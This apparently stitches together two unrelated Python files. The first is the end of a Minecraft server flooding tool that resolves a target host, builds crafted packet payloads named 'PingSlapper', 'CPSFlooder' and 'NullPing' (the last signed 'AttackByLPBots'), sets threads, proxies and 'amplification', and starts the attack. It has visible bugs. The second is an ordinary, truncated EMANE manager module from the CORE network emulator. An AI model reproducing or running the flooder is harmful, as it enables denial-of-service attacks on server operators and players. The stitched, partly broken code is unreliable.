NoProxy = str(input("» NoProxy (BETA [Attack without Proxies <FASTER> ]) true/false: "))
if (NoProxy == "true"):
socks_type = 6 # No Proxies
beta = "True"
else:
socks.type = choice
beta = "False"
print("» IP - " + str(ip))
print("» Port - " + str(port))
print("» Method - " + str(Method))
print("» Threads - " + str(thread_num))
print("» Socks - " + str(socks_type))
print("» Amplification - " + str(amplification))
print("» NoProxy - " + str(beta))
print("")
input("» Press enter «")
print("")
start()
def start():
event = threading.Event()
print("» Initiating Threads")
print("» Starting Attack [Print Mode Disabled, Change in Flooder.py]")
build_threads(mode,thread_num,event,socks_type)
event.clear()
event.set()
while True:
try:
time.sleep(0)
except KeyboardInterrupt:
break
if len(sys.argv) == 1:
opciones()
else:
global ip
global port
global socks_type
global proxies
global amplification
global choice
global opcion
global thread_num
global Test
global Test2
global Mensaje
global Method
global lista
ip = args.host
r1 = os.popen("curl -s https://api.mcsrvstat.us/2/" + ip).read()
start1 = ("\"ip\":\"")
end1 = "\","
ip = (r1.split(start1))[1].split(end1)[0]
lista = open("Nicks.txt").readlines()
PingSlapper = b'\xfe\x01\xfa\x00\x0b\x00M\x00C\x00|\x00P\x00i\x00n\x00g\x00H\x00o\x00s\x00t\x00#\x7f\x00\x0e\x001\x004\x007\x00.\x001\x003\x005\x00.\x003\x001\x00.\x001\x007\x005\x00\x00\x03\xe7'
CPSFlooder = b'\x0f\x00/\tlocalhostc\xdf\x02'
Part2 = b'\x01\xbc\x02\x0b\x00\tGhostyCeh' # can be randomized using a list of nicknames, but that's up to you
NullPing = b'\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01AttackByLPBots'
port = args.port
opcion = args.method
if (opcion == 1):
Mensaje = PingSlapper
Method = "DemonShredder"
if (opcion == 2):
Mensaje = CPSFlooder
Method = "HadesDestroyer"
if (opcion == 3):
Mensaje = NullPing
Method = "NullPing"
thread_num = args.threads
socks_type = args.type
out_file = args.proxiesFile
proxies = open(out_file).readlines()
amplification = int(args.amplification)
NoProxy = args.noProxy
if (NoProxy == "true"):
socks_type = 6 # No Proxies
beta = "True"
else:
socks.type = args.type
beta = "False"
print("» IP - " + str(ip))
print("» Port - " + str(port))
print("» Method - " + str(Method))
print("» Threads - " + str(thread_num))
print("» Socks - " + str(socks_type))
print("» Amplification - " + str(amplification))
print("» NoProxy - " + str(beta))
print("")
input("» Press enter «")
print("")
start()
|
emanemanager.py
|
"""
emane.py: definition of an Emane class for implementing configuration control of an EMANE emulation.
"""
import logging
import os
import threading
from core import CoreCommandError
from core import constants
from core.api import coreapi
from core.api import dataconversion
from core.conf import ConfigGroup
from core.conf import ConfigShim
from core.conf import Configuration
from core.conf import ModelManager
from core.emane import emanemanifest
from core.emane.bypass import EmaneBypassModel
from core.emane.commeffect import EmaneCommEffectModel
from core.emane.emanemodel import EmaneModel
from core.emane.ieee80211abg import EmaneIeee80211abgModel
from core.emane.rfpipe import EmaneRfPipeModel
from core.emane.tdma import EmaneTdmaModel
from core.enumerations import ConfigDataTypes
from core.enumerations import ConfigFlags
from core.enumerations import ConfigTlvs
from core.enumerations import MessageFlags
from core.enumerations import MessageTypes
from core.enumerations import NodeTypes
from core.enumerations import RegisterTlvs
from core.misc import nodeutils
from core.misc import utils
from core.xml import emanexml
try:
from emane.events import EventService
from emane.events import LocationEvent
from emane.events.eventserviceexception import EventServiceException
except ImportError:
try:
from emanesh.events import EventService
from emanesh.events import LocationEvent
from emanesh.events.eventserviceexception import EventServiceException
except ImportError:
logging.debug("compatible emane python bindings not installed")
EMANE_MODELS = [
EmaneRfPipeModel,
EmaneIeee80211abgModel,
EmaneCommEffectModel,
EmaneBypassModel,
EmaneTdmaModel
]
class EmaneManager(ModelManager):
"""
EMANE controller object. Lives in a Session instance and is used for
building EMANE config files from all of the EmaneNode objects in this
emulation, and for controlling the EMANE daemons.
"""
name = "emane"
config_type = RegisterTlvs.EMULATION_SERVER.value
SUCCESS, NOT_NEEDED, NOT_READY = (0, 1, 2)
EVENTCFGVAR = "LIBEMANEEVENTSERVICECONFIG"
DEFAULT_LOG_LEVEL = 3
def __init__(self, session):
"""
Creates a Emane instance.
:param core.session.Session session: session this manager is tied to
:return: nothing
"""
super(EmaneManager, self).__init__()
self.session = session
self._emane_nodes = {}
self._emane_node_lock = threading.Lock()
self._ifccounts = {}
self._ifccountslock = threading.Lock()
# port numbers are allocated from these counters
self.platformport = self.session.options.get_config_int("emane_platform_port", 8100)
self.transformport = self.session.options.get_config_int("emane_transform_port", 8200)
self.doeventloop = False
self.eventmonthread = None
# model for global EMANE configuration options
self.emane_config = EmaneGlobalModel(session)
self.set_configs(self.emane_config.default_values())
session.broker.handlers.add(self.handledistributed)
self.service = None
self.event_device = None
self.emane_check()
def getifcconfig(self, node_id, interface, model_name):
"""
Retrieve interface configuration or node configuration if not provided.
:param int node_id: node id
:param interface: node interface
:param str model_name: model to get configuration for
:return: node/interface model configuration
:rtype: dict
"""
# use the network-wide config values or interface(NEM)-specific values?
if interface is None:
return self.get_configs(node_id=node_id, config_type=model_name)
else:
# don"t use default values when interface config is the same as net
# note here that using ifc.node.objid as key allows for only one type
# of each model per node;
# TODO: use both node and interface as key
# Adamson change: first check for iface config keyed by "node:ifc.name"
# (so that nodes w/ multiple interfaces of same conftype can have
# different configs for each separate interface)
key = 1000 * interface.node.objid
if interface.netindex is not None:
key += interface.netindex
# try retrieve interface specific configuration, avoid getting defaults
config = self.get_configs(node_id=key, config_type=model_name)
# otherwise retrieve the interfaces node configuration, avoid using defaults
if not config:
config = self.get_configs(node_id=interface.node.objid, config_type=model_name)
# get non interface config, when none found
if not config:
# with EMANE 0.9.2+, we need an extra NEM XML from
# model.buildnemxmlfiles(), so defaults are returned here
config = self.get_configs(node_id=node_id, config_type=model_name)
return config
def config_reset(self, node_id=None):
super(EmaneManager, self).config_reset(node_id)
self.set_configs(self.emane_config.default_values())
def emane_check(self):
"""
Check if emane is installed and load models.
:return: nothing
"""
try:
# check for emane
emane_version = utils.check_cmd(["emane", "--version"])
logging.info("using EMANE: %s", emane_version)
# load default emane models
self.load_models(EMANE_MODELS)
# load custom models
custom_models_path = self.session.options.get_config("emane_models_dir")
if custom_models_path:
emane_models = utils.load_classes(custom_models_path, EmaneModel)
self.load_models(emane_models)
except CoreCommandError:
logging.info("emane is not installed")
def deleteeventservice(self):
if self.service:
for fd in self.service._readFd, self.service._writeFd:
if fd >= 0:
os.close(fd)
for f in self.service._socket, self.service._socketOTA:
if f:
f.close()
self.service = None
self.event_device = None
def initeventservice(self, filename=None, shutdown=False):
"""
Re-initialize the EMANE Event service.
The multicast group and/or port may be configured.
"""
self.deleteeventservice()
if shutdown:
return
# Get the control network to be used for events
group, port = self.get_config("eventservicegroup").split(":")
self.event_device = self.get_config("eventservicedevice")
eventnetidx = self.session.get_control_net_index(self.event_device)
if eventnetidx < 0:
logging.error("invalid emane event service device provided: %s", self.event_device)
return False
# make sure the event control network is in place
eventnet = self.session.add_remove_control_net(net_index=eventnetidx, remove=False, conf_required=False)
if eventnet is not None:
# direct EMANE events towards control net bridge
self.event_device = eventnet.brname
eventchannel = (group, int(port), self.event_device)
# disabled otachannel for event service
# only needed for e.g. antennaprofile events xmit by models
logging.info("using %s for event service traffic", self.event_device)
try:
self.service = EventService(eventchannel=eventchannel, otachannel=None)
except EventServiceException:
logging.exception("error instantiating emane EventService")
return True
def load_models(self, emane_models):
"""
Load EMANE models and make them available.
"""
for emane_model in emane_models:
logging.info("loading emane model: %s", emane_model.__name__)
self.models[emane_model.name] = emane_model
def add_node(self, emane_node):
"""
Add a new EmaneNode object to this Emane controller object
:param core.emane.nodes.EmaneNode emane_node: emane node to add
:return: nothing
"""
with self._emane_node_lock:
if emane_node.objid in self._emane_nodes:
raise KeyError("non-unique EMANE object id %s for %s" % (emane_node.objid, emane_node))
self._emane_nodes[emane_node.objid] = emane_node
def getnodes(self):
"""
Return a set of CoreNodes that are linked to an EmaneNode,
e.g. containers having one or more radio interfaces.
"""
# assumes self._objslock already held
nodes = set()
for emane_node in self._emane_nodes.values():
for netif in emane_node.netifs():
nodes.add(netif.node)
return nodes
def setup(self):
"""
Populate self._objs with EmaneNodes; perform distributed setup;
associate models with EmaneNodes from self.config. Returns
Emane.(SUCCESS, NOT_NEEDED, NOT_READY) in order to delay session
instantiation.
"""
logging.debug("emane setup")
# TODO: drive this from the session object
with self.session._objects_lock:
for node in self.session.objects.itervalues():
if nodeutils.is_node(node, NodeTypes.EMANE):
logging.debug("adding emane node: id(%s) name(%s)", node.objid, node.name)
self.add_node(node)
if not self._emane_nodes:
logging.debug("no emane nodes in session")
return EmaneManager.NOT_NEEDED
# control network bridge required for EMANE 0.9.2
# - needs to be configured before checkdistributed() for distributed
# - needs to exist when eventservice binds to it (initeventservice)
if self.session.master:
otadev = self.get_config("otamanagerdevice")
netidx = self.session.get_control_net_index(otadev)
logging.debug("emane ota manager device: index(%s) otadev(%s)", netidx, otadev)
if netidx < 0:
logging.error("EMANE cannot start, check core config. invalid OTA device provided: %s", otadev)
return EmaneManager.NOT_READY
ctrlnet = self.session.add_remove_control_net(net_index=netidx, remove=False, conf_required=False)
self.distributedctrlnet(ctrlnet)
eventdev = self.get_config("eventservicedevice")
logging.debug("emane event service device: eventdev(%s)", eventdev)
if eventdev != otadev:
netidx = self.session.get_control_net_index(eventdev)
logging.debug("emane event service device index: %s", netidx)
if netidx < 0:
logging.error("EMANE cannot start, check core config. invalid event service device: %s", eventdev)
return EmaneManager.NOT_READY
ctrlnet = self.session.add_remove_control_net(net_index=netidx, remove=False, conf_required=False)
self.distributedctrlnet(ctrlnet)
if self.checkdistributed():
# we are slave, but haven't received a platformid yet
platform_id_start = "platform_id_start"
default_values = self.emane_config.default_values()
value = self.get_config(platform_id_start)
if value == default_values[platform_id_start]:
return EmaneManager.NOT_READY
self.check_node_models()
return EmaneManager.SUCCESS
def startup(self):
"""
After all the EmaneNode objects have been added, build XML files
and start the daemons. Returns Emane.(SUCCESS, NOT_NEEDED, or
NOT_READY) which is used to delay session instantiation.
"""
self.reset()
r = self.setup()
# NOT_NEEDED or NOT_READY
if r != EmaneManager.SUCCESS:
return r
nems = []
with self._emane_node_lock:
self.buildxml()
self.initeventservice()
self.starteventmonitor()
if self.numnems() > 0:
self.startdaemons()
self.installnetifs()
for emane_node in self._emane_nodes.itervalues():
for netif in emane_node.netifs():
nems.append((netif.node.name, netif.name, emane_node.getnemid(netif)))
if nems:
emane_nems_filename = os.path.join(self.session.session_dir, "emane_nems")
try:
with open(emane_nems_filename, "w") as f:
for nodename, ifname, nemid in nems:
f.write("%s %s %s\n" % (nodename, ifname, nemid))
except IOError:
logging.exception("Error writing EMANE NEMs file: %s")
return EmaneManager.SUCCESS
def poststartup(self):
"""
Retransmit location events now that all NEMs are active.
"""
if not self.genlocationevents():
return
with self._emane_node_lock:
for key in sorted(self._emane_nodes.keys()):
emane_node = self._emane_nodes[key]
logging.debug("post startup for emane node: %s - %s", emane_node.objid, emane_node.name)
emane_node.model.post_startup()
for netif in emane_node.netifs():
x, y, z = netif.node.position.get()
emane_node.setnemposition(netif, x, y, z)
def reset(self):
"""
remove all EmaneNode objects from the dictionary,
reset port numbers and nem id counters
"""
with self._emane_node_lock:
self._emane_nodes.clear()
# don't clear self._ifccounts here; NEM counts are needed for buildxml
self.platformport = self.session.options.get_config_int("emane_platform_port", 8100)
self.transformport = self.session.options.get_config_int("emane_transform_port", 8200)
def shutdown(self):
"""
stop all EMANE daemons
"""
with self._ifccountslock:
self._ifccounts.clear()
with self._emane_node_lock:
if not self._emane_nodes:
return
logging.info("stopping EMANE daemons.")
self.deinstallnetifs()
self.stopdaemons()
self.stopeventmonitor()
def handledistributed(self, message):
"""
Broker handler for processing CORE API messages as they are
received. This is used to snoop the Link add messages to get NEM
counts of NEMs that exist on other servers.
"""
if message.message_type == MessageTypes.LINK.value and message.flags & MessageFlags.ADD.value:
nn = message.node_numbers()
# first node is always link layer node in Link add message
if nn[0] in self.session.broker.network_nodes:
serverlist = self.session.broker.getserversbynode(nn[1])
for server in serverlist:
with self._ifccountslock:
if server not in self._ifccounts:
self._ifccounts[server] = 1
else:
self._ifccounts[server] += 1
def checkdistributed(self):
"""
Check for EMANE nodes that exist on multiple emulation servers and
coordinate the NEM id and port number space.
If we are the master EMANE node, return False so initialization will
proceed as normal; otherwise slaves return True here and
initialization is deferred.
"""
# check with the session if we are the "master" Emane object?
master = False
with self._emane_node_lock:
if self._emane_nodes:
master = self.session.master
logging.info("emane check distributed as master: %s.", master)
# we are not the master Emane object, wait for nem id and ports
if not master:
return True
nemcount = 0
with self._emane_node_lock:
for key in self._emane_nodes:
emane_node = self._emane_nodes[key]
nemcount += emane_node.numnetif()
nemid = int(self.get_config("nem_id_start"))
nemid += nemcount
platformid = int(self.get_config("platform_id_start"))
# build an ordered list of servers so platform ID is deterministic
servers = []
for key in sorted(self._emane_nodes):
for server in self.session.broker.getserversbynode(key):
if server not in servers:
servers.append(server)
servers.sort(key=lambda x: x.name)
for server in servers:
if server.name == "localhost":
continue
if server.sock is None:
continue
platformid += 1
typeflags = ConfigFlags.UPDATE.value
self.set_config("platform_id_start", str(platformid))
self.set_config("nem_id_start", str(nemid))
config_data = ConfigShim.config_data(0, None, typeflags, self.emane_config, self.get_configs())
message = dataconversion.convert_config(config_data)
server.sock.send(message)
# increment nemid for next server by number of interfaces
with self._ifccountslock:
if server in self._ifccounts:
nemid += self._ifccounts[server]
return False
def buildxml(self):
"""
Build XML files required to run EMANE on each node.
NEMs run inside containers using the control network for passing
events and data.
"""
# assume self._objslock is already held here
logging.info("emane building xml...")
# on master, control network bridge added earlier in startup()
ctrlnet = self.session.add_remove_control_net(net_index=0, remove=False, conf_required=False)
self.buildplatformxml(ctrlnet)
self.buildnemxml()
self.buildeventservicexml()
# TODO: remove need for tlv messaging
def distributedctrlnet(self, ctrlnet):
"""
Distributed EMANE requires multiple control network prefixes to
be configured. This generates configuration for slave control nets
using the default list of prefixes.
"""
session = self.session
# slave server
if not session.master:
return
servers = session.broker.getservernames()
# not distributed
if len(servers) < 2:
return
prefix = session.options.get_config("controlnet")
prefixes = prefix.split()
# normal Config messaging will distribute controlnets
if len(prefixes) >= len(servers):
return
# this generates a config message having controlnet prefix assignments
logging.info("Setting up default controlnet prefixes for distributed (%d configured)" % len(prefixes))
prefixes = ctrlnet.DEFAULT_PREFIX_LIST[0]
vals = 'controlnet="%s"' % prefixes
tlvdata = ""
tlvdata += coreapi.CoreConfigTlv.pack(ConfigTlvs.OBJECT.value, "session")
tlvdata += coreapi.CoreConfigTlv.pack(ConfigTlvs.TYPE.value, 0)
tlvdata += coreapi.CoreConfigTlv.pack(ConfigTlvs.VALUES.value, vals)
rawmsg = coreapi.CoreConfMessage.pack(0, tlvdata)
msghdr = rawmsg[:coreapi.CoreMessage.header_len]
msg = coreapi.CoreConfMessage(flags=0, hdr=msghdr, data=rawmsg[coreapi.CoreMessage.header_len:])
self.session.broker.handle_message(msg)
def check_node_models(self):
"""
Associate EmaneModel classes with EmaneNode nodes. The model
configurations are stored in self.configs.
"""
for node_id in self._emane_nodes:
emane_node = self._emane_nodes[node_id]
logging.debug("checking emane model for node: %s", node_id)
# skip nodes that already have a model set
if emane_node.model:
logging.debug("node(%s) already has model(%s)", emane_node.objid, emane_node.model.name)
continue
# set model configured for node, due to legacy messaging configuration before nodes exist
model_name = self.node_models.get(node_id)
if not model_name:
logging.error("emane node(%s) has no node model", node_id)
raise ValueError("emane node has no model set")
config = self.get_model_config(node_id=node_id, model_name=model_name)
logging.debug("setting emane model(%s) config(%s)", model_name, config)
model_class = self.models[model_name]
emane_node.setmodel(model_class, config)
def nemlookup(self, nemid):
"""
Look for the given numerical NEM ID and return the first matching
EmaneNode and NEM interface.
"""
emane_node = None
netif = None
for node_id in self._emane_nodes:
emane_node = self._emane_nodes[node_id]
netif = emane_node.getnemnetif(nemid)
if netif is not None:
break
else:
emane_node = None
return emane_node, netif
def numnems(self):
"""
Return the number of NEMs emulated locally.
"""
count = 0
for emane_node in self._emane_nodes.itervalues():
count += len(emane_node.netifs())
return count
def buildplatformxml(self, ctrlnet):
"""
Build a platform.xml file now that all nodes are configured.
"""
nemid = int(self.get_config("nem_id_start"))
platform_xmls = {}
# assume self._objslock is already held here
for key in sorted(self._emane_nodes.keys()):
emane_node = self._emane_nodes[key]
nemid = emanexml.build_node_platform_xml(self, ctrlnet, emane_node, nemid, platform_xmls)
def buildnemxml(self):
"""
Builds the xxxnem.xml, xxxmac.xml, and xxxphy.xml files which
are defined on a per-EmaneNode basis.
"""
for key in sorted(self._emane_nodes.keys()):
emane_node = self._emane_nodes[key]
emanexml.build_xml_files(self, emane_node)
def buildtransportxml(self):
"""
Calls emanegentransportxml using a platform.xml file to build the transportdaemon*.xml.
"""
utils.check_cmd(["emanegentransportxml", "platform.xml"], cwd=self.session.session_dir)
def buildeventservicexml(self):
"""
Build the libemaneeventservice.xml file if event service options
were changed in the global config.
"""
need_xml = False
default_values = self.emane_config.default_values()
for name in ["eventservicegroup", "eventservicedevice"]:
a = default_values[name]
b = self.get_config(name)
if a != b:
need_xml = True
if not need_xml:
# reset to using default config
self.initeventservice()
return
try:
group, port = self.get_config("eventservicegroup").split(":")
except ValueError:
logging.exception("invalid eventservicegroup in EMANE config")
return
dev = self.get_config("eventservicedevice")
emanexml.create_event_service_xml(group, port, dev, self.session.session_dir)
def startdaemons(self):
"""
Start one EMANE daemon per node having a radio.
Add a control network even if the user has not configured one.
"""
logging.info("starting emane daemons...")
loglevel = str(EmaneManager.DEFAULT_LOG_LEVEL)
cfgloglevel = self.session.options.get_config_int("emane_log_level")
realtime = self.session.options.get_config_bool("emane_realtime", default=True)
if cfgloglevel:
logging.info("setting user-defined EMANE log level: %d", cfgloglevel)
loglevel = str(cfgloglevel)
emanecmd = ["emane", "-d", "-l", loglevel]
if realtime:
emanecmd += "-r",
otagroup, _otaport = self.get_config("otamanagergroup").split(":")
otadev = self.get_config("otamanagerdevice")
otanetidx = self.session.get_control_net_index(otadev)
eventgroup, _eventport = self.get_config("eventservicegroup").split(":")
eventdev = self.get_config("eventservicedevice")
eventservicenetidx = self.session.get_control_net_index(eventdev)
run_emane_on_host = False
for node in self.getnodes():
if hasattr(node, "transport_type") and node.transport_type == "raw":
run_emane_on_host = True
continue
path = self.session.session_dir
n = node.objid
# control network not yet started here
self.session.add_remove_control_interface(node, 0, remove=False, conf_required=False)
if otanetidx > 0:
logging.info("adding ota device ctrl%d", otanetidx)
self.session.add_remove_control_interface(node, otanetidx, remove=False, conf_required=False)
if eventservicenetidx >= 0:
logging.info("adding event service device ctrl%d", eventservicenetidx)
self.session.add_remove_control_interface(node, eventservicenetidx, remove=False, conf_required=False)
# multicast route is needed for OTA data
args = [constants.IP_BIN, "route", "add", otagroup, "dev", otadev]
node.check_cmd(args)
# multicast route is also needed for event data if on control network
if eventservicenetidx >= 0 and eventgroup != otagroup:
args = [constants.IP_BIN, "route", "add", eventgroup, "dev", eventdev]
node.check_cmd(args)
# start emane
args = emanecmd + ["-f", os.path.join(path, "emane%d.log" % n), os.path.join(path, "platform%d.xml" % n)]
output = node.check_cmd(args)
logging.info("node(%s) emane daemon running: %s", node.name, args)
logging.info("node(%s) emane daemon output: %s", node.name, output)
if not run_emane_on_host:
return
path = self.session.session_dir
emanecmd += ["-f", os.path.join(path, "emane.log")]
args = emanecmd + [os.path.join(path, "platform.xml")]
utils.check_cmd(args, cwd=path)
logging.info("host emane daemon running: %s", args)
def stopdaemons(self):
"""
Kill the appropriate EMANE daemons.
"""
# TODO: we may want to improve this if we had the PIDs from the specific EMANE daemons that we"ve started
args = ["killall", "-q", "emane"]
stop_emane_on_host = False
for node in self.getnodes():
if hasattr(node, "transport_type") and node.transport_type == "raw":
stop_emane_on_host = True
continue
if node.up:
node.cmd(args, wait=False)
# TODO: RJ45 node
if stop_emane_on_host:
try:
utils.check_cmd(args)
utils.check_cmd(["killall", "-q", "emanetransportd"])
except CoreCommandError:
logging.exception("error shutting down emane daemons")
def installnetifs(self):
"""
Install TUN/TAP virtual interfaces into their proper namespaces
now that the EMANE daemons are running.
"""
for key in sorted(self._emane_nodes.keys()):
emane_node = self._emane_nodes[key]
logging.info("emane install netifs for node: %d", key)
emane_node.installnetifs()
def deinstallnetifs(self):
"""
Uninstall TUN/TAP virtual interfaces.
"""
for key in sorted(self._emane_nodes.keys()):
emane_node = self._emane_nodes[key]
emane_node.deinstallnetifs()
def doeventmonitor(self):
"""
Returns boolean whether or not EMANE events will be monitored.
"""
# this support must be explicitly turned on; by default, CORE will
# generate the EMANE events when nodes are moved
return self.session.options.get_config_bool("emane_event_monitor")
def genlocationevents(self):
"""
Returns boolean whether or not EMANE events will be generated.
"""
# By default, CORE generates EMANE location events when nodes
# are moved; this can be explicitly disabled in core.conf
tmp = self.session.options.get_config_bool("emane_event_generate")
if tmp is None:
tmp = not self.doeventmonitor()
return tmp
def starteventmonitor(self):
"""
Start monitoring EMANE location events if configured to do so.
"""
logging.info("emane start event monitor")
if not self.doeventmonitor():
return
if self.service is None:
logging.error("Warning: EMANE events will not be generated "
"because the emaneeventservice\n binding was "
"unable to load "
"(install the python-emaneeventservice bindings)")
return
self.doeventloop = True
self.eventmonthread = threading.Thread(target=self.eventmonitorloop)
self.eventmonthread.daemon = True
self.eventmonthread.start()
def stopeventmonitor(self):
"""
Stop monitoring EMANE location events.
"""
self.doeventloop = False
if self.service is not None:
self.service.breakloop()
# reset the service, otherwise nextEvent won"t work
self.initeventservice(shutdown=True)
if self.eventmonthread is not None:
# TODO: fix this
self.eventmonthread._Thread__stop()
self.eventmonthread.join()
self.eventmonthread = None
def eventmonitorloop(self):
"""
Thread target that monitors EMANE location events.
"""
if self.service is None:
return
logging.info("subscribing to EMANE location events. (%s)", threading.currentThread().getName())
while self.doeventloop is True:
_uuid, _seq, events = self.service.nextEvent()
# this occurs with 0.9.1 event service
if not self.doeventloop:
break
for event in events:
nem, eid, data = event
if eid == LocationEvent.IDENTIFIER:
self.handlelocationevent(nem, eid, data)
logging.info("unsubscribing from EMANE location events. (%s)", threading.currentThread().getName())
def handlelocationevent(self, rxnemid, eid, data):
"""
Handle an EMANE location event.
"""
events = LocationEvent()
events.restore(data)
for event in events:
txnemid, attrs = event
if "latitude" not in attrs or "longitude" not in attrs or "altitude" not in attrs:
logging.warn("dropped invalid location event")
continue
# yaw,pitch,roll,azimuth,elevation,velocity are unhandled
lat = attrs["latitude"]
lon = attrs["longitude"]
alt = attrs["altitude"]
logging.debug("emane location event: %s,%s,%s", lat, lon, alt)
self.handlelocationeventtoxyz(txnemid, lat, lon, alt)
def handlelocationeventtoxyz(self, nemid, lat, lon, alt):
"""
Convert the (NEM ID, lat, long, alt) from a received location event
into a node and x,y,z coordinate values, sending a Node Message.
Returns True if successfully parsed and a Node Message was sent.
"""
# convert nemid to node number
_emanenode, netif = self.nemlookup(nemid)
if netif is None:
logging.info("location event for unknown NEM %s", nemid)
return False
n = netif.node.objid
# convert from lat/long/alt to x,y,z coordinates
x, y, z = self.session.location.getxyz(lat, lon, alt)
x = int(x)
y = int(y)
z = int(z)
logging.info("location event NEM %s (%s, %s, %s) -> (%s, %s, %s)", nemid, lat, lon, alt, x, y, z)
xbit_check = x.bit_length() > 16 or x < 0
ybit_check = y.bit_length() > 16 or y < 0
zbit_check = z.bit_length() > 16 or z < 0
if any([xbit_check, ybit_check, zbit_check]):
logging.error("Unable to build node location message, received lat/long/alt exceeds coordinate "
"space: NEM %s (%d, %d, %d)", nemid, x, y, z)
return False
# generate a node message for this location update
try:
node = self.session.get_object(n)
except KeyError:
logging.exception("location event NEM %s has no corresponding node %s" % (nemid, n))
return False
# don"t use node.setposition(x,y,z) which generates an event
node.position.set(x, y, z)
node_data = node.data(message_type=0, lat=str(lat), lon=str(lon), alt=str(alt))
self.session.broadcast_node(node_data)
return True
def emanerunning(self, node):
"""
Return True if an EMANE process associated with the given node is running, False otherwise.
"""
args = ["pkill", "-0", "-x", "emane"]
status = node.cmd(args)
return status == 0
class EmaneGlobalModel(EmaneModel):
"""
Global EMANE configuration options.
"""
_DEFAULT_DEV = "ctrl0"
name = "emane"
emulator_xml = "/usr/share/emane/manifest/nemmanager.xml"
emulator_defaults = {
"eventservicedevice": _DEFAULT_DEV,
"eventservicegroup": "224.1.2.8:45703",
"otamanagerdevice": _DEFAULT_DEV,
"otamanagergroup": "224.1.2.8:45702"
}
emulator_config = emanemanifest.parse(emulator_xml, emulator_defaults)
emulator_config.insert(
0,
Configuration(_id="platform_id_start", _type=ConfigDataTypes.INT32, default="1",
label="Starting Platform ID (core)")
)
nem_config = [
Configuration(_id="nem_id_start", _type=ConfigDataTypes.INT32, default="1",
label="Starting NEM ID (core)")
]
@classmethod
def configurations(cls):
return cls.emulator_config + cls.nem_config
@classmethod
def config_groups(cls):
emulator_len = len(cls.emulator_config)
